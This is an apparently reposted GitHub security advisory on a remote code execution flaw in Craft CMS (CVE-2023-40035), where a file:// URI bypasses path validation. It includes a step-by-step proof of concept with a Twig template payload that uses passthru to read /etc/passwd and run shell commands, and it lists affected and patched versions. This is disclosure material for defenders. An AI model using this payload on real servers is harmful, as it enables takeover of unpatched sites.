Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-44wr-rmwq-3phw: Craft CMS vulnerable to Remote Code Execution via validatePath bypass

Summary

Bypassing the validatePath function can lead to potential Remote Code Execution (Post-authentication, ALLOW_ADMIN_CHANGES=true)

Details

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it's 4 levels up from here
$vendorPath = $findConfigPath('--vendorPath', 'CRAFT_VENDOR_PATH') ?? dirname(__DIR__, 3);

// Set the "project root" path that contains config/, storage/, etc. By default assume that it's up a level from vendor/.
$rootPath = $findConfigPath('--basePath', 'CRAFT_BASE_PATH') ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory
$dotenvPath = $findConfigPath('--dotenvPath', 'CRAFT_DOTENV_PATH') ?? "$rootPath/.env";
$configPath = $findConfigPath('--configPath', 'CRAFT_CONFIG_PATH') ?? "$rootPath/config";
$contentMigrationsPath = $findConfigPath('--contentMigrationsPath', 'CRAFT_CONTENT_MIGRATIONS_PATH') ?? "$rootPath/migrations";
$storagePath = $findConfigPath('--storagePath', 'CRAFT_STORAGE_PATH') ?? "$rootPath/storage";
$templatesPath = $findConfigPath('--templatesPath', 'CRAFT_TEMPLATES_PATH') ?? "$rootPath/templates";
$translationsPath = $findConfigPath('--translationsPath', 'CRAFT_TRANSLATIONS_PATH') ?? "$rootPath/translations";
$testsPath = $findConfigPath('--testsPath', 'CRAFT_TESTS_PATH') ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

    /**
     * @param string $attribute
     * @param array|null $params
     * @param InlineValidator $validator
     * @return void
     * @since 4.4.6
     */
    public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
    {
        // Make sure it’s not within any of the system directories
        $path = FileHelper::absolutePath($this->getRootPath(), '/');

        $systemDirs = Craft::$app->getPath()->getSystemPaths();

        foreach ($systemDirs as $dir) {
            $dir = FileHelper::absolutePath($dir, '/');
            if (str_starts_with("$path/", "$dir/")) {
                $validator->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
                break;
            }
        }
    }

ref. https://www.php.net/manual/en/wrappers.file.php

PoC

  1. Create a new filesystem. Base Path: file:///var/www/html/templates

1

  1. Create a new asset volume. Asset Filesystem: local_bypass

2

  1. Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates
{{'<pre>'}}
{{1337*1337}}
{{['cat /etc/passwd']|map('passthru')|join}}
{{['id;pwd;ls -altr /']|map('passthru')|join}}

3 4

  1. Create a new route. URI: * , Template: poc.ttml

5

  1. Confirm RCE on arbitrary path ( /* )

6

PoC Env

0628 env

Impact

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)

ghsa
Open in Source
#vulnerability#git#php#rce#auth
  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2023-40035

Craft CMS vulnerable to Remote Code Execution via validatePath bypass

High severity GitHub Reviewed Published Aug 19, 2023 in craftcms/cms • Updated Aug 21, 2023

Package

Affected versions

>= 4.0.0-RC1, <= 4.4.14

>= 3.0.0, <= 3.8.14

Patched versions

4.4.15

3.8.15

Summary

Bypassing the validatePath function can lead to potential Remote Code Execution
(Post-authentication, ALLOW_ADMIN_CHANGES=true)

Details

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it’s 4 levels up from here $vendorPath = $findConfigPath('–vendorPath’, ‘CRAFT_VENDOR_PATH’) ?? dirname(__DIR__, 3);

// Set the “project root” path that contains config/, storage/, etc. By default assume that it’s up a level from vendor/. $rootPath = $findConfigPath('–basePath’, ‘CRAFT_BASE_PATH’) ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory $dotenvPath = $findConfigPath('–dotenvPath’, ‘CRAFT_DOTENV_PATH’) ?? "$rootPath/.env"; $configPath = $findConfigPath('–configPath’, ‘CRAFT_CONFIG_PATH’) ?? "$rootPath/config"; $contentMigrationsPath = $findConfigPath('–contentMigrationsPath’, ‘CRAFT_CONTENT_MIGRATIONS_PATH’) ?? "$rootPath/migrations"; $storagePath = $findConfigPath('–storagePath’, ‘CRAFT_STORAGE_PATH’) ?? "$rootPath/storage"; $templatesPath = $findConfigPath('–templatesPath’, ‘CRAFT_TEMPLATES_PATH’) ?? "$rootPath/templates"; $translationsPath = $findConfigPath('–translationsPath’, ‘CRAFT_TRANSLATIONS_PATH’) ?? "$rootPath/translations"; $testsPath = $findConfigPath('–testsPath’, ‘CRAFT_TESTS_PATH’) ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

/\*\*
 \* @param string $attribute
 \* @param array|null $params
 \* @param InlineValidator $validator
 \* @return void
 \* @since 4.4.6
 \*/
public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
{
    // Make sure it’s not within any of the system directories
    $path = FileHelper::absolutePath($this\->getRootPath(), '/');

    $systemDirs = Craft::$app\->getPath()->getSystemPaths();

    foreach ($systemDirs as $dir) {
        $dir = FileHelper::absolutePath($dir, '/');
        if (str\_starts\_with("$path/", "$dir/")) {
            $validator\->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
            break;
        }
    }
}

ref. https://www.php.net/manual/en/wrappers.file.php

PoC

  1. Create a new filesystem. Base Path: file:///var/www/html/templates

  2. Create a new asset volume. Asset Filesystem: local_bypass

  3. Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates

{{’<pre>’}} {{1337*1337}} {{[‘cat /etc/passwd’]|map(‘passthru’)|join}} {{[‘id;pwd;ls -altr /’]|map(‘passthru’)|join}}

  1. Create a new route. URI: * , Template: poc.ttml

  2. Confirm RCE on arbitrary path ( /* )

PoC Env

Impact

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)

References

  • GHSA-44wr-rmwq-3phw
  • craftcms/cms@0bd3386
  • https://github.com/craftcms/cms/releases/tag/3.8.15
  • https://github.com/craftcms/cms/releases/tag/4.4.15

Published to the GitHub Advisory Database

Aug 21, 2023

Last updated

Aug 21, 2023

Related news

CVE-2023-40035: Remote Code Execution via validatePath bypass

Craft is a CMS for creating custom digital experiences on the web and beyond. Bypassing the validatePath function can lead to potential remote code execution. This vulnerability can lead to malicious control of vulnerable systems and data exfiltrations. Although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution). This issue has been patched in version 4.4.15 and version 3.8.15.

ghsa: Latest News

GHSA-8fh4-942r-jf2g: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/services.inc.php
ghsa